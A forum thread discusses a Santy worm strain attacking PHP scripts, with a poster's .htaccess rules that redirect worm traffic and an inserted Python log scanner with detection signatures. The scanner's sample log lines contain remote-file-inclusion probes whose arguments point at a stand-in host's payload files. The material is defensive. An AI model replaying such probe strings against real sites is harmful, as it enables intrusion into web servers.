Be Advised! New Santy Strain Attacks All PHP Web Scripts!
JaguarPC Community, Open Discussion & Chit-chat forum

#1 Vin DSL

    Folks, it seems that the Santy worm has taken on a new strain. It also searches Yahoo now in addition to Google, but it looks for any PHP scripts with all possible arguments passed through in the HTTP GET. This worm tries all arguments in your PHP script to throw in shell commands that access a particular website, download some text files into /tmp, and then execute them using Perl...
    SOURCE: http://castlecops.com/article-5640-nested-0-0.html (Full Story)
    DISCLAIMER Any resemblance between the views expressed above and those of the owners and operators of this system is purely coincidental. Any resemblance between these views and my own are non-deterministic. The existence of Vin DSL is questionable. The existence of views in the absence of anyone to hold them is problematic. The existence of the reader is left as an exercise in the second-order coefficient.

    No Guts, No Story! VinDSL © 2010

#2 Oldfrog
    Yeah, I have been watching Paul fight it in one of the staff forums there. I have not wanted to disturb him while busy but have a couple of questions:

    1) Okay, I am fully upgraded to phpbb2.0.11 so am I still vulnerable?

    2) Paul has some seclists to http://modsecurity.org/ that seem to be holding the line. I am thinking that this can only be applied at the server level. If I am wrong and it can be implemented on a hosted site I would gladly go for it. Can it?
    Gravity, more than a good idea, it's the law!

#3 Ron
    <snif> I miss being able to see the admin forums here <snif>

#4 Vin DSL
    Okay...

    I've been working on this most of the night. I pored over a 295MB log file for hours (thank God for my Intel P4). I examined hundreds of Santy worm attacks against my web site, yada, yada...

    Basically, I've been hit by three variants. Some contain a common UA. Some contain a common URI. Many share a common string. So, for now, I'm using this quick 'n' dirty solution.

    I've added the following directives to .htaccess

    Code:
    RewriteEngine On
    
    #Send Santy worm variant #1 packing (LWP user agents)
    #Guard: never rewrite the trap page itself, so the rule cannot loop
    RewriteCond %{REQUEST_URI} !emailsforyou\.php
    RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
    RewriteRule ^.*$ emailsforyou.php [L]
    
    #Send Santy worm variant #2 packing (URI contains "visualcoders")
    #%{REQUEST_URI} always begins with "/", so "^visualcoders" could never match;
    #match the string anywhere in the path instead
    RewriteCond %{REQUEST_URI} !emailsforyou\.php
    RewriteCond %{REQUEST_URI} visualcoders [NC]
    RewriteRule ^.*$ emailsforyou.php [L]
    
    #Send Santy worm variant #3 packing (rush= argument in the query string)
    RewriteCond %{REQUEST_URI} !emailsforyou\.php
    RewriteCond %{QUERY_STRING} rush=([^&]+) [NC]
    RewriteRule ^.*$ emailsforyou.php [L]
    Of course, you can send the worms 'packing' to any place you want. Personally, I send them to a script on my web site that generates 100 bogus, random, email addies.

    http://www.lenon.com/emailsforyou.php


    P.S. Hey, Jag, if you happen to read this, check out ticket #2097291. It's a classic...
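As an added example (not code from the forum post or from any of the posters), here is a Python scanner that applies the same three signatures used in the .htaccess rules above (an `lwp` user agent, `visualcoders` in the request path, a `rush=` argument) to Apache combined-format access log lines, plus a generic check for the behaviour described in post #1: any GET argument that carries a remote URL. The log lines, hosts, paths and file names are constructed for the example, and the generic remote-URL check is this example's own assumption about what a Santy-style probe looks like, not a published signature.

```python
"""Scan Apache combined-format access log lines for Santy-style probes.

Added example, not from the forum thread. The three per-variant signatures
mirror the .htaccess rules posted above; the generic "argument carries a
remote URL" check is an assumption about the worm's probing behaviour.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" LogFormat:
#   host ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Assumption: a probe stuffs an absolute URL into a script argument.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    # keep_blank_values so "?foo=" still counts as a supplied argument
    rec['args'] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of signatures a parsed request matches (empty list = clean)."""
    hits = []
    if rec['ua'].lower().startswith('lwp'):
        hits.append('variant1-lwp-ua')
    if 'visualcoders' in rec['path'].lower():
        hits.append('variant2-visualcoders-uri')
    if any(k.lower() == 'rush' for k, _ in rec['args']):
        hits.append('variant3-rush-arg')
    if any(REMOTE_URL_RE.match(v) for _, v in rec['args']):
        hits.append('generic-remote-url-in-arg')
    return hits


def scan(lines):
    """Tally hits per signature; return (Counter, list of (host, target, hits))."""
    counts = Counter()
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            counts['unparsed'] += 1
            continue
        hits = classify(rec)
        if hits:
            flagged.append((rec['host'], rec['target'], hits))
            for h in hits:
                counts[h] += 1
        else:
            counts['clean'] += 1
    return counts, flagged


# Constructed sample lines (not real traffic): one request per variant, one
# clean visitor, one search-engine crawler, and one line in the wrong format.
SAMPLE_LOG = [
    '203.0.113.5 - - [27/Dec/2004:03:14:07 -0700] "GET /docs/legal.php?page=http://198.51.100.9/x.txt? HTTP/1.0" 200 512 "-" "lwp-trivial/1.41"',
    '203.0.113.6 - - [27/Dec/2004:03:15:21 -0700] "GET /visualcoders/spy.php?id=1 HTTP/1.0" 404 0 "-" "Mozilla/4.0"',
    '203.0.113.7 - - [27/Dec/2004:03:16:02 -0700] "GET /modules/download.php?rush=http://198.51.100.9/spyki.txt? HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '198.51.100.20 - - [27/Dec/2004:03:17:45 -0700] "GET /index.php?page=about HTTP/1.1" 200 4096 "http://www.example.com/" "Mozilla/5.0 (X11; Linux)"',
    '198.51.100.21 - - [27/Dec/2004:03:18:10 -0700] "GET /phpBB2/viewtopic.php?t=42 HTTP/1.1" 200 8192 "-" "Googlebot/2.1"',
    'this line is not in combined format',
]

if __name__ == '__main__':
    counts, flagged = scan(SAMPLE_LOG)
    for host, target, hits in flagged:
        print(host, target, ', '.join(hits))
    print(dict(counts))
```

To run it against a real log, pass the open file to `scan()` (for example `scan(open('access_log'))`); the counter gives the per-variant tally that the rewrite rules act on, and `flagged` lists the source hosts for blocking or follow-up. Note that the generic check will also flag legitimate scripts that take a full URL as a parameter, so review those hits before treating the host as hostile.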

#5 Spathiphyllum
    So does the exploit also have an email harvesting component? I could understand sabotaging their list if that is the goal, but is there any other purpose in creating a randomizing false email lister? Wouldn't that just create even more unnecessary traffic if one is getting bombarded by numerous worm GETs? Mind you, I use a mine here and there to sabotage misbehaving robots too, but the rogues are so few and far between that it doesn't create excessive false link tracking - it just makes a nice page for the robots to get themselves in deeper trouble.

#6 Vin DSL
    Quote Originally Posted by Spathiphyllum
    So does the exploit also have an email harvesting component?
    No, that's not the reason I did that...

    There is going to be some collateral damage from those directives. The LWP::Simple Perl module is extremely common on the net, but what's a guy to do?

    I figured, if some innocent person gets directed to that page, at least the text will indicate it was because of their UA.

#7 Vin DSL
    Quote Originally Posted by Spathiphyllum
    Wouldn't that just create even more unnecessary traffic if one is getting bombarded by numerous worm GETs?
    Oh, another thing...

    I've noticed these worms give it one shot, for the most part, then they're gone. So...

    You got a better idea?

#8 Spathiphyllum
    Quote Originally Posted by Vin DSL
    I've noticed these worms give it one shot, for the most part, then they're gone. So...

    You got a better idea?
    Well if it stops them from returning, then I'd call it an effective response.

    Nah, no better ideas from my end. That you and Ron have put something together is valuable in its own right. I was just wondering if there was some email harvesting going on in addition to searching for more nodes of infection.

    I guess if I was using phpBB, I might be a little more inclined to find a solution to annoy the crackers. Besides, I have enough fires to put out... who needs more work?

#9 Vin DSL
    Quote Originally Posted by Spathiphyllum
    I guess if I was using phpBB, I might be a little more inclined to find a solution to annoy the crackers...
    I don't mean to nit-pick you, bro, but the point of this thread is Santy variants are now going after ALL .PHP scripts, not just phpBB. phpBB exploits are 'old school' now. That was last month...

    The new Santy variants are mostly attacking my 'Legal Documents' script, e.g. my disclaimers, and also my Download module, not phpBB.

#10 Spathiphyllum
    Quote Originally Posted by Vin DSL
    I don't mean to nit-pick you, bro,...
    Duly noted.
    Quote Originally Posted by Vin DSL
    ..but the point of this thread is Santy variants are now going after ALL .PHP scripts, not just phpBB. phpBB exploits are 'old school' now. That was last month...

    The new Santy variants are mostly attacking my 'Legal Documents' script, e.g. my disclaimers, and also my Download module, not phpBB.
    OK, ahem, Your Honor... I'd like to amend my response:

    "I guess if I was using *.php, I might be a little more inclined to find a solution to annoy the ****ards. Besides, I have enough fires to put out... who needs more work?"

#11 Vin DSL
    That's more like it...

    Hey, is Christmas over? Can I quit drinking this damn Michelob Ultra?

#12 Spathiphyllum
    Christmas may be over but it's pre-New Year's Eve week. I'd advise slipping into some spirits of Southern Comfort to build up one's tolerance for NYEve proper instead.

    Anyway, what's the difference between old-n-lousy Michelob and new-n-improved Ultra? Caffeine? Label? Caramel coloring? Preservative?

#13 Vin DSL
    Quote Originally Posted by Spathiphyllum
    Anyway, what's the difference between old-n-lousy Michelob and new-n-improved Ultra? Caffeine? Label? Caramel coloring? Preservative?
    I just bought this crap 'cause I had relatives over. I bought 'The Rock' for myself, but that's what everyone ended up drinking. ***ards!!! So, now I'm stuck with 18 bottles of 'near beer.'

    "18 bottles of beer on the wall, 18 bottles of beer..."

#14 Spathiphyllum
    Just a suggestion - mix it with some water and feed your plants. The soil loves the yeast and the plants will like the boost. Add a little sugar/molasses to the mix and the microbes go nuts - just keep it off the leaves.

#15 Vin DSL
    I think I'll save it for next Christmas. Maybe it'll be good by then!